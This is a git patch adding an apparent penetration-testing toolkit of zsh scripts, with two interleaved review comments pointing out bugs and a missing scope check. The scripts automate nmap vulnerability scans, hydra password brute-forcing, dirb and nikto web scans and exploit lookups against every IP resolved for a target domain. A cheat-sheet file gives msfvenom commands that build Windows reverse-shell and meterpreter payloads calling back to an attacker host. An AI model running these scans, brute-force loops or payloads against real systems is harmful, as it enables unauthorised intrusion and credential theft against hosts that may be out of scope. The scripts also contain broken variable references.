From 51629b5b0a2e3e50c283509e29628d9e405928b7 Mon Sep 17 00:00:00 2001
From: 51x
Date: Tue, 10 Jan 2017 21:55:43 +0100
Subject: [PATCH] chaoscommit 1
---
 | 1 +
chaosdir/agro.zsh | 46 ++++++
chaosdir/chaosfunction.zsh | 272 +++++++++++++++++++++++++++++++++
chaosdir/halp/note_example.txt | 11 ++
4 files changed, 330 insertions(+)
create mode 100644 
create mode 100644 chaosdir/agro.zsh
create mode 100644 chaosdir/chaosfunction.zsh
create mode 100644 chaosdir/halp/note_example.txt
diff --git a/ b/
new file mode 100644
index 0000000..447769d
--- /dev/null
+++ b/
@@ -0,0 +1 @@
+Penetration Tester's Zsh - functions 4 fast pawn
diff --git a/chaosdir/agro.zsh b/chaosdir/agro.zsh
new file mode 100644
index 0000000..0f3f1eb
--- /dev/null
+++ b/chaosdir/agro.zsh
@@ -0,0 +1,46 @@
+#!/bin/zsh
+# Agro scanner standalone
+# License: GNU GPL v3, see LICENSE file
+# Creation date: 2017.01.10. 21:30
+# Dependencies: apt-get update && apt-get install zsh nmap python2.7 libxml2-utils -y
+
+# Variables
+targetx=( # Space delimited!
+ports=(21-23,25-26,53,80-81,110-111,113,135,139,143,179,199,443,445,465,514-515,548,554,587,646,993,995,1025-1027,1433,1720,1723,2000-2001,3306,3389,4443,5060,5666,5900,6001,8000,8008,8080,8443,8888,10000,32768,49152,49154,11211)
+
+# Initialize directory and naming structure
+cdate=$(date +"%Y-%m-%d")
+mkdir -p result-$cdate
+cd result-$cdate
+touch scan_history.txt
+echo "---- Starting AgroScanner ----" >> scan_history.txt
+
+# Start with standard alive scan and check ports on alive hosts
+
+# Get alive hosts
+echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting alive hosts scan." >> scan_history.txt
+nmap --randomize-hosts -sn -PS$ports $targetx -oG 1_alive_hosts.out
+alive_hosts=$(grep "Status: Up" 1_alive_hosts.out | cut -d' ' -f2 | tr '\r\n' ' ')
+echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished alive hosts scan. Found hosts: " $alive_hosts >> scan_history.txt
+
+# Port scanning on alive hosts and version detection
+echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting port scans on alive hosts with top 1000." >> scan_history.txt
+nmap --randomize-hosts -sS -sV -n -Pn --top-ports 1000 $targetx > 2_ports_and_service_top1000_on_alive_hosts.out
+python ../ | sed -n '/ /s/ \+/ /gp' > 3_ip_port_service.out
+number_open_tcp_ports=$(grep -v "Nmap scan report for" 3_ip_port_service.out |wc -l) # It lists all ports, even unknown and faster to grep from here for this.
+echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished port scans on alive hosts with top 1000. Number of open ports: " $number_open_tcp_ports >> scan_history.txt
+
+# Run UDP scan on most common ports
+echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting UDP scans." >> scan_history.txt
+nmap -sU --top-ports 50 $targetx > 4_udpscan.out
+number_open_udp_ports=$(grep "open" 4_udpscan.out |wc -l)
+echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished UDP scans. Number of open UDP ports: " $number_open_udp_ports >> scan_history.txt
+
+# Vulnerability scanning
+echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting simple vulnerbility scans." >> scan_history.txt
+nmap -n -p 21 --script=ftp-anon.nse $targetx > 5_nmap_script_ftpanon.txt
+#nmap -sU -sS --script smb-enum-* -p U:137,T:139 $targetx > 6_nmap_sbm_nse_scan.txt # There is issue with the * askterisk... should be escaped or something
+nmap -sS -n -p $ports --script=default,safe,vuln $targetx > 7_nmap_script_default-safe-vuln_scan.txt
+echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished vulnerability scans. Lists are in the relevant txt files." >> scan_history.txt
+
+
diff --git a/chaosdir/chaosfunction.zsh b/chaosdir/chaosfunction.zsh
new file mode 100644
index 0000000..e58a1b6
--- /dev/null
+++ b/chaosdir/chaosfunction.zsh
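Review bot: The TCP, UDP and NSE scans are all run against `$targetx` with `-Pn`, even though the sweep just above computed `$alive_hosts`, so the "Port scanning on alive hosts" comment is wrong and the sweep result only ever reaches the log. Use the computed list in those nmap invocations (zsh needs explicit word-splitting for a scalar), e.g. `nmap --randomize-hosts -sS -sV -n -Pn --top-ports 1000 ${=alive_hosts} > 2_ports_and_service_top1000_on_alive_hosts.out`, and skip the scans when it is empty. `--script=default,safe,vuln` is a union and the vuln category contains scripts that are also tagged `dos`; the sibling chaosfunction.zsh already excludes those with `and not (broadcast or dos)`, so the last scan should match it with `--script="(default or safe or vuln) and not dos"`. `cd result-$cdate` is unchecked — if it fails every output file lands in the caller's directory — so write `cd result-$cdate || exit 1`.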
@@ -0,0 +1,272 @@
+#!/bin/zsh
+# Agro scanner standalone
+# License: GNU GPL v3, see LICENSE file
+# Creation date: 2017.01.10. 21:30
+# Dependencies: apt update && apt install zsh nmap python2.7 libxml2-utils -y
+# Dependencies for offensive part: apt install theharvester nmap fierce dnsrecon dnsutils hydra dirb sqlmap wget dirb curl nikto libxml2-utils whatweb
+# Requires root, sry.
+
+# Variables
+targetx=( # Space delimited!
+ports=(21-23,25-26,53,80-81,110-111,113,135,139,143,179,199,443,445,465,514-515,548,554,587,646,993,995,1025-1027,1433,1720,1723,2000-2001,3306,3389,4443,5060,5666,5900,6001,8000,8008,8080,8443,8888,10000,32768,49152,49154,11211)
+
+# Initialize directory and naming structure
+cdate=$(date +"%Y-%m-%d")
+mkdir -p result-$cdate
+cd result-$cdate
+touch scan_history.txt
+echo "---- Starting AgroScanner ----" >> scan_history.txt
+
+# Start with standard alive scan and check ports on alive hosts
+
+# Get alive hosts
+echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting alive hosts scan." >> scan_history.txt
+nmap --randomize-hosts -sn -PS$ports $targetx -oG 1_alive_hosts.out
+alive_hosts=$(grep "Status: Up" 1_alive_hosts.out | cut -d' ' -f2 | tr '\r\n' ' ')
+echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished alive hosts scan. Found hosts: " $alive_hosts >> scan_history.txt
+
+# Port scanning on alive hosts and version detection
+echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting port scans on alive hosts with top 1000." >> scan_history.txt
+nmap --randomize-hosts -sS -sV -n -Pn --top-ports 1000 $targetx > 2_ports_and_service_top1000_on_alive_hosts.out
+python ../ | sed -n '/ /s/ \+/ /gp' > 3_ip_port_service.out
+number_open_tcp_ports=$(grep -v "Nmap scan report for" 3_ip_port_service.out |wc -l) # It lists all ports, even unknown and faster to grep from here for this.
+echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished port scans on alive hosts with top 1000. Number of open ports: " $number_open_tcp_ports >> scan_history.txt
+
+# Run UDP scan on most common ports
+echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting UDP scans." >> scan_history.txt
+nmap -sU --top-ports 50 $targetx > 4_udpscan.out
+number_open_udp_ports=$(grep "open" 4_udpscan.out |wc -l)
+echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished UDP scans. Number of open UDP ports: " $number_open_udp_ports >> scan_history.txt
+
+# Vulnerability scanning
+echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting simple vulnerbility scans." >> scan_history.txt
+nmap -n -p 21 --script=ftp-anon.nse $targetx > 5_nmap_script_ftpanon.txt
+#nmap -sU -sS --script smb-enum-* -p U:137,T:139 $targetx > 6_nmap_sbm_nse_scan.txt # There is issue with the * askterisk... should be escaped or something
+nmap -sS -n -p $ports --script=default,safe,vuln $targetx > 7_nmap_script_default-safe-vuln_scan.txt
+echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished vulnerability scans. Lists are in the relevant txt files." >> scan_history.txt
+
+
+
+# Offensive part
+echo "Usage $0 [tor] [user wordlist] [password wordlist] [nessusURL:port] [nessususer] [nessuspassword]"
+
+#echo "Updating searchsploit"
+#searchsploit -u
+
+# TODO parse arguments correctly
+echo "[DEBUG] number of arguments $#"
+
+
+# torify everything on demand
+if [ $2 == "tor" ]; then echo "TOR mode ON" && torrequested=true; fi
+
+
+# VARIABLES
+currentdir=$(pwd)
+# hydra protocol not bruted by nmap
+hydrabruteprotocol=(cvs firebird icq irc ldap nntp oracle-listener oracle-sid pcanywhere pcnfs postgres rdp redis rtsp ssh sip teamspeak vmauthd)
+#TODO provides usernames password in args
+usernames="/usr/share/nmap/nselib/data/usernames.lst"
+passwords="/usr/share/nmap/nselib/data/passwords.lst"
+# Nessus
+nessusapi=$5
+nessususer=$6
+nessuspass=$7
+
+
+# TODO low priority optimize tools location if not in Kali OS
+# nmap = which nmap
+# fierce = which fierce ...
+
+
+if [ $# -eq 0 ]; then echo "please provide something to pentest you dumb bear (ᵔᴥᵔ) ! :D" ; exit ; fi
+
+if [ "$(id -u)" != "0" ]; then
+ echo "This script must be run as root for Nmap scripting and syn scan." 1>&2
+ exit 1
+fi
+
+# Attacked domain
+domainattacked=$1;
+echo "Domain attacked is : $domainattacked !"
+
+
+# START RECON PART
+
+# Enum domain with std wordlist
+echo "Enumerating domains ";
+fierce -dns $1 -wide -file targets.fierce
+# Dnsreconing
+dnsrecon -d $domainattacked -t std,brt,srv,axfr,goo --iw -a -s -c $currentdir/targets.dnsrecon
+echo "Enumerating domains ... DONE";
+# Robtex graph
+echo "Getting graph of the domain infrastructure"
+wget -qO $domainattacked.png "$domainattacked"
+# getting a traceroute for network device mapping
+traceroute $domainattacked > $domainattacked.traceroute
+tcptraceroute $domainattacked 80 >> $domainattacked.traceroute
+tcptraceroute $domainattacked 25 >> $domainattacked.traceroute
+
+
+# extract IPs
+cat targets.dnsrecon | grep -v 'hostnames found' | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" | sort -u > ips.lst;
+echo "IPs extracted ! Ready to shoot."
+#extract IP ranges
+cat targets.fierce | grep 'hostnames found' | grep -E -o "([0-9]{1,3}[\.-]){4}[0-9]{1,3}" | sort -u > ipranges.lst
+echo "IPs ranges extracted as well. If you want to extend scan.";
+
+# LEGACY add dig ANY targets , NS , SRV , ... done by dnsrecon now
+# dig +recurse +authority $domainattacked ANY | grep -v 'SERVER' | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" | sort -u >> ips.lst;
+
+
+# TODO extend IP detection with
+# rwhois ? SPF IP ?
+
+
+# TODO building custom userlist with harvester, add vhost and add ips ?
+echo "Harvesting info about domain $domainattacked"
+#theharvester -d $domainattacked -b all -v > $domainattacked.harvester
+#grep IP inside .harvester
+
+# EXTENDING if requested extend scan to ip ranges
+# nmap -sL >> ips.lst
+
+# CLEANING before starting if IPs added with other scripts
+# cat ips.lst | sort -u > finalips.lst
+
+
+# START SERVICES PART
+
+# SERVICES ENUM FINGERPRINT + NSE VULN PART
+# main loop for IP
+for x in `cat ips.lst`; do
+
+
+
+# create a dir per IP for db txt files
+ mkdir $x;
+ echo "Enumerating ports and services, vuln scanning and brute forcing ... jeez thats alota work";
+
+# full scan
+# echo "Full nmap scan start"
+# nmap -sSU -p T:1-65535,U:7,9,11,13,17,19,20,37,39,42,49,52-54,65-71,81,111,161,123,136-170,514-518,630,631,636-640,650,653,921,1023-1030,1900,2048-2050,27900,27960,32767-32780,32831 -sV --script="(default or vuln or auth or brute or discovery) and not (broadcast or dos)" --script-args="unsafe=1,userdb=$usernames,passwd=$passwords" --host-timeout=180m --max-hostgroup=1 -Pn -v $x -oA $x/nmapresults
+# reduced scan for TESTING
+ echo "[DEBUG] TEST MODE for nmap sS top1k ONLY"
+ nmap -sS -sV --script="(default or vuln or auth or brute or discovery) and not (broadcast or dos)" --host-timeout=30m --max-hostgroup=1 -Pn $x -oA $x/nmapresults
+ echo "Nmap fingerprinting and NSE for $x... DONE";
+
+# TODO
+
+ echo "[UNDER CONSTRUCTION] Nessus API Scan";
+ echo "Starting the Nessus scan ..."
+ token=`curl -k -X POST -H 'Content-Type: application/json' -d '{"username":"$nessususer","password":"$nessuspassword"}' "https://$nessusurl/session"`
+
+# echo "Adding targets to FULL scan"
+#+ call nessus api
+# get results in the end
+
+
+# TODO service / version detection for smarter brute force and searchsploit
+ # echo "[UNDER CONSTRUCTION] Smart protocol detection for hydra ..."
+ # cat nmapresults.xml | grep "port protocol" | cut -d '"' -f12
+
+
+#getting nmap CPE version of services and using Searchsploit
+# REPORT services version and cleaning the file
+ echo -n "" > $x/
+ for z in `cat $x/nmapresults.xml | grep ''`; do echo $z | grep -ozP "(?s).*?(?=)" >> $x/ && echo "" >> $x/; done
+
+# REPORT exploitdb search from nmap
+ echo "Searching interesting vulnerabilities for target $x"
+ #legacy searchsploit for a in $(cat $x/; do echo $a | cut -d : -f3-5 | tr ":" " " | cut -d '.' -f1 >> $x/version.exploits; done
+ searchsploit -v --nmap $x/nmapresults.xml > $x/version.exploits;
+
+# TODO ADD default credentials
+
+
+#### Brute force non nmap
+# TODO optimtize per port
+ echo "STARTING additional BRUTE FORCE PART with hydra";
+ echo "[DEBUG] not bruting for faster testing";
+ for b in ${hydrabruteprotocol[@]}; do hydra -L $usernames -P $passwords -o $x/validuserpass.hydra $b://$x; done;
+ echo "FINISHED additional hydra BRUTE FORCE";
+
+
+ echo "Enumerating ports and services, fingerprinting, vuln scanning and brute forcing .... DONE ";
+
+
+##################### STOP SERVICES PART
+
+
+###################### START WEB PART
+#### WEB VULNS PART
+ echo "Web pentesting now ...";
+# vhost enum
+ echo "Vhost enum"
+# adding the IP as vhost , often forgotten
+ echo "$x" >> $x/vhost.list;
+# manual reverse PTR in case there is none
+ cat targets.dnsrecon | grep $x | grep '^A' | cut -d ',' -f2 >> $x/vhost.list;
+# reverse PTR
+ dig +short -x $x >> $x/vhost.list;
+# using robtex from nmap
+ awk '/hostmap-robtex/{f=1;next} /ip-geolocation-geoplugin/{f=0} f' $x/nmapresults.nmap >> $x/vhost.list; # extract vhosts from NMAP robtex script
+# adding hackertarget vhost
+ timeout 2m curl "$x" >> vhost.list;
+# TO DO add harvester ?
+# sorting vhosts
+ sort -u $x/vhost.list > $x/vhost.sorted;
+
+echo "Start port loop for $x"
+
+# if HTTP port test
+ for y in `cat $x/nmapresults.nmap | grep '/tcp' | grep ' http ' | cut -d '/' -f1`;
+ ### WEB RECON
+ do echo "start vhost loop for IP $y";
+ for z in `cat $x/vhost.sorted`;
+ # dirb for each vhost
+ do dirb "http://$z:$y" -f -l > "$x/enum$z.dirb";
+ ### WEB fingerprint
+ whatweb -v "http://$z:$y";
+ # nikto for each vhost
+ nikto -host "http://$z:$y" > "$x/$z.nikto";
+
+ # arachni
+ # arachni
+
+ # sqlmap for earch vhost
+ #sqlmap --crawl=2 --forms --batch
+
+ done; ## end vhost loop
+ done; ## end nmap port loop
+
+
+# if HTTPS port
+# TO DO again
+# copy pasta
+# for y in `cat $x/nmapresults.nmap | grep '/tcp' | grep 'ssl/http' | cut -d '/' -f1`;
+
+done; ## end IP loop
+
+
+# REPORT VULNS FOUND
+echo "======================================"
+echo "Vulnerability summary from NSE Scripts"
+echo ""
+grep -i "vulner" -B1 */nmapresults.nmap
+echo "You might also need to read manually also the .nmap as vulnerable state is not harmonized through NSE"
+echo ""
+
+echo "======================================"
+echo "ExploitDB research results"
+echo ""
+echo "Interesting exploits found: "
+cat */version.exploits
+echo ""
+
+echo "======================================"
+echo "Bruteforce results"
+echo ""
+echo "Valid passwords found: "
+cat */validuserpass.hydra
+echo ""
diff --git a/chaosdir/halp/note_example.txt b/chaosdir/halp/note_example.txt
new file mode 100644
index 0000000..79060ba
--- /dev/null
+++ b/chaosdir/halp/note_example.txt
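Review bot: The Nessus login in the IP loop (`token=\`curl -k ... "https://$nessusurl/session"\``) can never authenticate: the JSON body is single-quoted so `$nessususer` and `$nessuspassword` are sent as literal text, `$nessuspassword` and `$nessusurl` are never assigned (the variables set at the top are `nessuspass=$7` and `nessusapi=$5`), and `-k` disables certificate validation while the credentials sit in curl's argv where any local user can read them with `ps`. Feed the body through stdin instead, `token=$(printf '{"username":"%s","password":"%s"}' "$nessususer" "$nessuspass" | curl -s -X POST -H 'Content-Type: application/json' --data @- "https://$nessusapi/session")`, and replace `-k` with `--cacert` for the scanner's self-signed certificate. Two smaller slips in the same loop: `timeout 2m curl "$x" >> vhost.list` writes outside the per-host directory that every neighbouring line uses (`>> $x/vhost.list`), and the hydra loop runs unconditionally right after printing `[DEBUG] not bruting for faster testing`. Most importantly, `ips.lst` is whatever dnsrecon resolved for the domain, which may well include third-party mail, CDN or hosting addresses, yet every entry is port-scanned, NSE-brute-forced and hydra-attacked with no allow-list check; filter it against an engagement scope file (for example `grep -F -x -f scope.lst ips.lst > inscope.lst`) before the `for x in` loop so out-of-scope hosts are never touched.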
@@ -0,0 +1,11 @@
+C0nn3ctz shell meterpreter windows
+
+c00nt3nt
+
+Windows msfvenom cheat sheet
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f exe > shell.exe
+msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # STAGED, use this with msf
+msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # NON-STAGED
+msfvenom -p windows/x64/exec cmd="cmd /c calc.exe" -f dll > d3d9.dll
+msfvenom -p windows/exec CMD="cmd /c calc.exe" -f dll > d3d9.dll
+msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=$theip LPORT=$theport